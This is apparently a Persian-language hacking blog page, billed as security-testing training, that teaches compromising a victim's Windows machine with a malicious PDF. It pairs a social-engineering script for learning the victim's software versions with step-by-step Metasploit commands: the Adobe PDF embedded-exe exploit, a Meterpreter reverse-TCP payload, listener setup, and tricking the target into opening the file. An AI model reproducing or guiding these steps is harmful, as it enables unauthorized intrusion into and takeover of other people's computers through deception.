• 98XXXXXXXXXX+
  • mynymhmd2@gmail.com
  • TEHRAN-IRAN
  • 98914XXXXXXX+
تیم امنیتی دکترهک

Dr.Hack Team

Android - Windows - Linux

هک گوشی با فایل PDF

هک گوشی با فایل PDF

 

آموزش تست امنیت ویندوز با هک با فایل pdf

یکی از سوالات پر تکرار کاربران این است که چگونه می توانیم تست نفوذ خود را با فرمت های مختلف انجام دهیم و به نتیجه برسیم ؟؟ اولین کاری که باید انجام دهید این است که درباره هدف خود اطلاعات جمع اوری کنید و همانگونه که می دانید اولین و مهم ترین مرحله در تست نفوذ information gathering یا  جمع اوری اطلاعات است زیرا هرچقدر اطلاع بیشتری از هدف و قربانی خود به دست اورید کار شما در هنگام تست نفوذ بسیار راحت تر خواهد بود و سریع تر پیش خواهد رفت , به این منظور باید اطلاعاتی از قبیل برنامه های موجود بر روی سیستم هدف خود را بدانید , اما چگونه ؟ نفوذگر می تواند با استفاده از مهندسی اجتماعی به راحتی متوجه شود که قربانی خود از چه ابزار هایی استفاده می کند .

 

 

نفوذگر با هر روشی با قربانی خود ارتباط برقرار می کند ( برقراری ارتباط می تواند به صورت مجازی و استفاده از شبکه های اجتماعی باشد یا به صورت حضوری یا تلفنی و … باشد. ) سپس نفوذگر در این مرحله خود را یک کاربر تازه وارد در دنیای کامپیوتر معرفی می کند و از قربانی خود سوالاتی طبیعی خواهد پرسید , برای مثال : سلام دوست عزیز من شنیده ام که شما در زمینه کامپیوتر مهارت خوبی دارید می توانید به من کمک کنید تا نرم افزار های مورد نیاز اولیه برای یک کامیپوتر را نصب کنم ؟؟

 

سپس زمانی که قربانی این حقه را باور کرد نفوذگر می تواند از او سوال کند :

  • به نظر شما برای نمایش ویدیو در سیستم از چه مدیا پلیری استفاده کنم ؟
  • به نظر شما بهترین ورژن مجموعه نرم افزار office کدام است ؟
  • به نظر شما از کدام نسخه ادوب استفاده کنم ؟

درک مفهوم مهندسی اجتماعی

خب شاید از خود بپرسید که چنین سوالاتی بسیار ساده هستند و چنین اطلاعاتی به چه درد نفوذ گر می خورد, اما بیایید کمی به پشت پرده این سوالات دقت داشته باشیم . زمانی که نفوذگر چنین سوالاتی را از قربانی خود خواهد پرسید , قربانی بدون شک نسخه ای از نرم افزار را به نفوذگر پیشنهاد خواهد داد که خودش نیز در حال استفاده از ان نسخه است و به این ترتیب نفوذگر از ابزار های موجود و ورژن ابزار های موجود در سیستم قربانی مطلع خواهد شد وسپس نفوذگر می توانید با استفاده از جستجو در سایت های ثبت اکسپلویت به دنبال اسیب پذیری های مربوطه بگردد و در نهایت به نتیجه دلخواه خود برسد.

 

نحوه هک با فایل pdf

 

در ابتدا سیستم عامل کالی لینوکس خود را بوت و راه اندازی کنید سپس باید ابزار Metasploit را اجرا کنید , به این منظور می توانید ترمینال لینوکس خود را اجرا کنید و دستور زیر را در این محیط وارد کنید تا این ابزار برای شما اجرا شود :

 

msfconsole

سپس زمانی که محیط متاسپلویت برای شما اجرا شد باید با استفاده از دستور زیر اکسپلویت مورد نظر را فراخوانی کنید :

 

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

 

در این مرحله باید آپشن های مورد نظر خود را بر روی اکسپلویت تنظیم کنید که برای مشاهده آپشن های موجود می توانید از دستور زیر استفاده نمایید :

 

show options

 

حال می توانید با استفاده از دستور زیر و تعیین نام , یک نام را برای فایل Pdf خود انتخاب کنید :

 

set FILENAME readme.pdf

در مرحله بعدی باید یک پیلود برای اکسپلویت خود انتخاب کنید که پیشنهاد ما استفاده از پیلود meterpreter است , به این منظور از دستور زیر برای تنظیم یک پیلود استفاده کنید :

set PAYLOAD /windows/meterpreter/reverse_tcp

سپس باید با استفاده از دستور show options , اپشن های موجود را مشاهده کنید و ان را به صورت مراحل پایین شخصی سازی نمایید.

 

انجام تنظیمات متاسپلویت برای تست نفوذ و هک با فایل pdf

با استفاده از دستور زیر ای پی خود را بر روی پیلود تنظیم کنید :

set LHOST 127.0.0.1

نکته : برای مشاهده ای پی خود می توانید از دستور ifconfig استفاده کنید. سپس باید با استفاده از دستور زیر یک پورت دلخواه از پورت های شبکه را به پیلود معرفی کنید :

set LPORT 4567

در این مرحله باید فایل مخرب pdf خود را ایجاد کنید :

exploit

سپس یک ترمینال جدید باز کنید و دستور زیر را در ترمینال وارد نمایید :

cd /root/Desktop/ && mv /root/.msf4/local/readme.pdf readme.pd 

دستور بالا یک دستور ترکیبی است که ابتدا شما را به مسیر دسکتاپ وارد می کند و سپس فایل مخرب شما که در مسیر /root/.msf4/local/ قرار دارد را به صفحه دسکتاپ شما انتقال خواهد داد. در این مرحله به محیط متاسپلویت بازگردید و با استفاده از اکسپلویت مولتی هندلر یک listener برای هک تارگت خود با فایل pdf ایجاد کنید. سپس می توانید با استفاده از روش های مهندسی اجتماعی تارگت خود را قانع کنید تا بر روی فایل مخرب شما کلیک کند و اگر قربانی شما از ابزار اسیب پذیر و ورژن اسیب پذیر استفاده کند , شما می توانید از قربانی خود دسترسی بگیرید.

 

 

 

 

 

 
سفارش محصول
ابتدا یکبار کدامنیتی را تعویض سپس وارد کنید
 
 
تنها امکان ارسال نظر خصوصی وجود دارد
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی
نظر شما به هیچ وجه امکان عمومی شدن در قسمت نظرات را ندارد، و تنها راه پاسخگویی به آن نیز از طریق پست الکترونیک می‌باشد. بنابراین در صورتیکه مایل به دریافت پاسخ هستید، پست الکترونیک خود را وارد کنید.